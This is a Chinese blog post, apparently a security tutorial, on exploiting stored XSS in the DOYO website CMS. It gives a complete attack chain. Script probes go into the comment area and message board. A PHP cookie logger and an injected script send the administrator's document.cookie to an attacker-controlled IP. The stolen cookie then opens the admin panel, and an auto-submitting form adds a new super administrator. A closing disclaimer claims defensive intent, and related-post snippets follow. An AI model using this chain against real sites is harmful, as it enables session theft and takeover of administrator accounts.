DOYO网站xss漏洞测试

最新推荐文章于 2024-04-25 15:30:00 发布
最新推荐文章于 2024-04-25 15:30:00 发布
阅读量1.1k 收藏 3
点赞数 1
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25645753/article/details/108269348
版权

一、寻找xss漏洞

一般想获取最高权限,就要找存储型xss漏洞,这样的漏洞是服务器和浏览器进行数据交换的,有利于数据写入进去。一般留言板、评论区可能性最大。
1、评论区 <script>alert(1111)</script>
在这里插入图片描述
在这里插入图片描述
弹出1111,证明咱们找到评论区xss的漏洞了。并且代码也执行了。
2、留言板 aaaaa<script>alert(222)</script>
在这里插入图片描述
在这里插入图片描述
由于这个留言需要管理员审查,我们去后台看一下,有没有弹窗。
证明咱们留言板的xss漏洞也找到了。并且代码执行了。

二、利用漏洞

通过上述操作,我们会发现,评论区管理员不需要做什么,就可以简单的发上去,但是留言板需要管理员审查才可以发表上去。我们可以利用xss漏洞获取管理员权限,为了可以获取管理员权限,这次需要管理员配合我们获取(比如点击我们写的留言,查看我们留言什么的),总之为了获取管理权限,不能少了管理员。
1、我们需要获取管理员的账号和密码,但是这个除了sql注入,目前还没什么更快的办法获取到。这样我们就要思维活跃一点不能让思维困住我们,之前学过cookie和SESSID,这俩个是存储密码用的(不懂的童鞋,看我之前的博客学习一下,这里不讲)为了我们能获取到管理员的cookie。我们需要用php写一段代码:

<?php
$referer = $_SERVER['HTTP_REFERER'];//超级全局变量(告诉服务器从哪来的)获取前一个页面的url地址。
$cookie = $_GET['cookie'];//获取cookie值
$time= date ("y-m-d G-i-s A");//添加时间戳
$file = fopen('abs.txt','a+');//创建文本名字是abs.txt,权限是a+(可读写模式)
fwrite($file,"cookie:".$cookie."/n referer:".$referer."/n time:".$time);//写入文件括号里的是想要的值
fclose($file);//关闭文件
?>

2、下面就需要把这句话添加到留言板里具体代码如下:

aaa<script>window.location.href="http://10.10.87.228/qwer/test.php?cookie="+document.cookie</script>//执行获取管理员cookie的语句

这里的ip地址是自己的电脑的地址,为了是获取完cookie传回本地电脑。
注:并且这个网页是可以访问的啊,要不然接受不到cookie。
在这里插入图片描述
注:用网页直接访问是不显示任何东西的。
在这里插入图片描述
写在留言板里
然后在本地目录就会生成一个abs.txt的文件。
在这里插入图片描述

这样我们就轻易的获取到管理员的cookie了,我们用大神写好的软件进一下管理的后台。
在这里插入图片描述
地址就填网站的管理员地址,再把提交方式改成GET,然后吧咱们获取的cookie填到里面。这样我们就不要任何的账号密码就顺利的进去后台管理页面了。
在这里插入图片描述

三、利用xss漏洞添加一个超级管理员

1.我们通过burp抓包,发现添加管理员页面发现这些变量。
在这里插入图片描述

2.一个是网页提交地址,一个是提交变量的名字。这样我们就可以自己写一个html网页把这些变量重新按我们想要的结果编写。代码如下:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
<form action="http://10.10.87.172/qzm/admin.php?c=a_adminuser&a=add&run=1" method="post" name="form1">
    //一个form表单,跳转地址是服务器地址,提交方式是post。
    <input type="hidden" name="auser" value="qqq">//添加的用户名是qqq
    <input type="hidden" name="apass" value="qqq">//添加的用户密码是qqq
    <input type="hidden" name="gid" value="1">//添加的我用户组是1
    <input type="hidden" name="level" value="1">//添加的用户权限是1
    <button type="submit" name="ok">123456</button>//提交按钮
</form>
<script>
    document.form1.submit();//执行提交动作
</script>
</body>
</html>

3.继续利用刚才的留言板漏洞插入js代码
qzm//执行添加管理员语句
注:代码同样是可以执行的
在这里插入图片描述

注:执行过程比较快
在这里插入图片描述在这里插入图片描述
成功添加管理员qqq

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

蜜罐小明哥
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
WEB常见漏洞XSS(靶场篇)
One-Fox安全团队的博客
06-30 1903
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!
XssAPP开源,Xss跨站脚本攻击测试平台(JAVA开发) BY:WebSOS
mywebsos的博客
06-19 7706
XssAPP 一套针对Xss跨站脚本攻击的专业测试平台 开源日期:2016-05-29 开发者:WebSOS 开发时间:2015年下半年 开发语言:JAVA 使用技术:Spring Hibernate 反射技术 说明:本程序源码一切权益归WebSOS所有,他人不得随意修改与转卖,本程序仅做技术交流,切勿用于非法途径 链接: http://pan.baidu.com/s/1kUWVkXp 密码: 885i
XSS漏洞-05】XSS-labs靶场通关大挑战
m0_64378913的博客
05-31 2781
目录1 实验简介2 XSS通关过程2.0 通关前注意2.1 关卡12.2 关卡22.3 关卡32.4 关卡42.5 关卡52.6 关卡62.7 关卡72.8 关卡82.9 关卡92.10 关卡102.11 关卡112.12 关卡122.13 关卡133 总结 1 实验简介 实验网站/靶场:http://test.ctf8.com/。 实验目的: 熟悉XSS漏洞测试的过程; 判断是否过滤与过滤规则; 练习XSS语句构造与绕过方法; 一边练习一边结合SQL注入进行比较; 一边练习一边思考编码与转码,后续补充这
Xss攻击测试
{竹子}
07-20 1092
1.下载 链接:https://pan.baidu.com/s/1BrYxwXHGZw8cLPnWHpWAIw 提取码:nj20 2.安装 1)安装python-2.7.12.msi 2)解压BruteXSS-1-master.zip,解压就可用 3.使用 双击执行brutexss.py 3.1.选择请求方式 请求方式有get/post 输入:p 3.2.输入请求url 输入测试的url 3.3.输入请求参数 输入请求参数 3.4.输入攻击字典列表 输入攻击字典列表文件,默认wordlist.tx
XSS漏洞检测和利用
最新发布
2301_80127209的博客
04-25 1072
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞
xss漏洞 (跨站脚本攻击)
qq_59607911的博客
10-17 267
标签:</script><script>alert(1)
收集了一些XSS攻击平台
gdhjgfr的博客
11-04 1807
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Attack APIB
安全测试XSS攻击
weixin_37998428的博客
08-17 2670
1,简短说明 这里只是把参考链接整理一下,备查 2,参考链接 https://blog.csdn.net/baidu_24024601/article/details/51957270 https://blog.csdn.net/xkweiguang/article/details/52945831 https://blog.csdn.net/hithedy/article/detail...
XSS漏洞常见攻击方式
天天学安全专属博客
10-08 4077
1.危害 都是通过js脚本来实现的浏览器内核版本也会影响到js代码的实现 1、钓鱼欺骗 2、网站挂马 3、身份盗用 4、盗取网站用户信息 5、垃圾信息发送 6、劫持用户Web行为 7、XSS蠕虫 2.原理 XSS 属于被动式的攻击。攻击者先构造一个跨站页面,利用script、、等各种方式使得用户浏览这个页面时,触发对被攻击站点的http 请求。此时,如果被攻击者如果已经在被攻击站点登录,就会持有该站点cookie。这样该站点会认为被攻击者发起了一个http 请求。而实际
DOYO模板手册
09-21
DOYO模板手册,DOYO模板文件说明 模板目录: template/default/ 其中default为默认模板风格目录,如你装有其他风格,则为对应风格目录 所有内容、栏目的模板模板均可在栏目设置中自由指定。以下列举系统默认模板文件: 全站首页: index.html 通用头部模板: head.html 通用尾部模板: bottom.html 文章(article频道)模板: 栏目聚合页:article/list_index.html 栏目文字列表页:article/list.html 栏目图片列表页:article/list_image.html 栏目介绍页:article/list_body.html 内容页:article/article.html 搜索页:article/search.html 产品(product频道)模板: 栏目聚合页:product/list_index.html 栏目文字列表页:product/list.html 栏目图片列表页:product/list_image.html 栏目介绍页:product/list_body.html 内容页:product/product.html 搜索页:product/search.html 留言(message频道)模板: message/message.html 专题模板: 专题首页:special/specia.html 专题文字列表页:special/specia_list.html 专题图片列表页:special/specia_image.html 会员模板: 会员登录:member/login.html 会员注册:member/reg.html 会员首页:member/index.html 会员修改信息:member/myinfo.html 会员发布内容管理:member/mylist.html 会员发布内容:member/release.html 会员留言管理:member/mymessage.html 会员评论管理:member/mycomment.html 自定义页面模板: custom/index.html
Web应用进行XSS漏洞测试
03-03
对WEB应用进行XSS漏洞测试,不能仅仅局限于在WEB页面输入XSS攻击字段,然后提交。绕过JavaScript的检测,输入XSS脚本,通常被测试人员忽略。下图为XSS恶意输入绕过JavaScript检测的攻击路径。XSS输入通常包含...
DOYO通用建站系统
08-22
软件介绍1、架构轻盈,完全免费与开源 采用轻量MVC架构开发,兼顾效率与拓展性。全局高效缓存,打造飞速体验。 2、功能自由搭配,保证系统纯净 全插件机制,安装卸载全绿色操作,无残留,对系统臃肿零容忍,最小仅数百K。 3、让简洁与强大并存 强大字段自定义功能,完善的后台开关模块,不会编程也能搭建各类网站系统。 4、会员、留言、投稿神马一个不能少 不断升级完善的模块与插件,灵活的组装与自定义设置,满足你的多样需求。 5、安装、升级、备份、转移一键完成 一键安装、一键升级、一键备份、一键转移。从此,让你的网站维护变得如此轻松。 6、顶级的配套服务 超级精美的模版库,精选国内性价比、速度、安全最佳的空间,让你远离挑选的烦恼。 DOYO通用建站系统系统功能: 1、功能频道:内容频道(强大自定义功能)、留言频道 2、插件模块:会员管理、广告管理、专题管理、评论管理、链接管理等 3、系统功能:静态HTML生成、自定义模板标签、附件清理、数据备份恢复 4、在线升级:一键自动在线安全补丁升级,免除维护烦恼 5、自定义字段:强大的自定义字段功能,可按栏目、频道添加各种输入字段,包括文本、数字、单选、多选、编辑器、单附件、多附件 6、SEO优化:独立的页面SEO信息设置,方便快捷 7、HTML静态:全站纯静态生成功能 8、附件检测:自动附件清理功能,一键清除未使用多余附件,保持系统纯净 9、高效缓存:全站高效缓存机制,运行飞速体验 10、模板代码生成器:自带模板调用生成器,零基础也能快速制作模板标签 11、全功能权限设定:分组机制管理权限设定,全功能全栏目均可指定管理权限 12、数据库操作:一键备份、一键恢复、一键转移空间,方便快捷 本次更新内容: 1、框架核心升级 3、修正当前栏目tid错误 4、修正修改投稿错误 5、去除后台留言多余链接 6、修正留言自定义字段错误 升级方法: 进入系统后台 系统—>在线升级(按提示操作升级即可) 其他版本请先在线升级到20120618版,然后再次执行在线升级即可
XSS漏洞 DOM型测试 payload代码
02-26
XSS漏洞 DOM型测试 payload代码 这是测试跨脚本攻击是否有DOM型XSS漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。
Douphp cms通杀漏洞(小宇特详解)
小宇的web博客
11-15 5453
Douphpcms通杀漏洞 老规矩在分析cms漏洞时,先在本机上安装cms,来进行代码审计。 这个通杀漏洞的原理就是通过找到data文件中的unlink文件进行删除,然后进行重新安装这个站点,然后我们对他进行恶意的传参,然后我拿到这个站点的webshell。 这个靶场是通过cms进行搭建的,我们事先在本地搭建一个 安装成功过后我们进行代码审计然后我们进行全局变量搜索,搜索函数unlink. 然后查找我们可以进行控制的地方,即控制它的传参变量 我们再这里找到了sql_filename这个变量,进去查看
PHP网页xss攻击测试用例,Web安全测试 | xss攻击
weixin_29357243的博客
03-22 492
xss攻击的全称是Cross-Site Scripting (XSS)攻击,是一种注入式攻击。基本的做法是把恶意代码注入到目标网站。由于浏览器在打开目标网站的时候并不知道哪些脚本是恶意的,所以浏览器会无差别执行恶意脚本,从而导致用户信息和一些敏感信息被盗取和泄漏。xss一般分为两种类型,持久化的xss和非持久化的xss。持久化xss下面这个例子演示了攻击者如何通过注入恶意代码去盗取用户的cooki...
Web安全测试常见漏洞-XSS
m0_57098592的博客
08-31 1093
Web安全测试常见漏洞-XSS
xss妙用,快速测试xss漏洞
椰树ii
05-24 1万+
#介绍# 这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site Scripting) Prevention Cheat Shee
XSS注入测试
热门推荐
u012114090的博客
07-16 4万+
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。   XSS ...
xss网站寻找xss漏洞
08-29
在手工挖掘中,可以参考中提供的实践案例,通过快速找出网站中可能存在的XSS漏洞。工具挖掘可以使用一些专门用于漏洞扫描的工具,例如permeate渗透测试系统。中提供了一个示例URL,你可以通过访问该网站来进行XSS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值